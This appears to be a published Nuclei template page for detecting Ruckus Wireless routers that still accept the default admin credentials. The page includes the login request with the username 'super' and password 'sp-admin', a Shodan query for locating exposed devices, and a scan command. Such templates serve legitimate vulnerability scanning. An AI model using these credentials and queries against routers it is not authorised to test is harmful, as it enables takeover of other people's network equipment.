Skip to content

Ruckus Wireless - Default Login

ID: ruckus-wireless-default-login

Severity: critical

Author: pussycat0x

Tags: default-login,router,ruckus

Ruckus Wireless router contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.

id: ruckus-wireless-default-login
info:
name: Ruckus Wireless - Default Login
author: pussycat0x
severity: critical
description: Ruckus Wireless router contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://docs.commscope.com/bundle/fastiron-08092-securityguide/page/GUID-32D3BB01-E600-4FBE-B555-7570B5024D34.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-1391
metadata:
verified: true
max-request: 1
shodan-query: title:"ruckus"
tags: default-login,router,ruckus
http:
- raw:
- |
POST /forms/doLogin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login_username={{username}}&password={{password}}
attack: pitchfork
payloads:
username:
- super
password:
- sp-admin
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Ruckus Wireless Admin</title>"
- "/status/device.asp"
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450221009660c7c51a6180900c4e2c5cb025b05547c2d7e778b0fc1caa5cce83dff20d2102207584f09fff66d5eec0f015d8d374c3cce536580784f00618ed8002bd33f342fb:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/ruckus/ruckus-wireless-default-login.yaml"

View on Github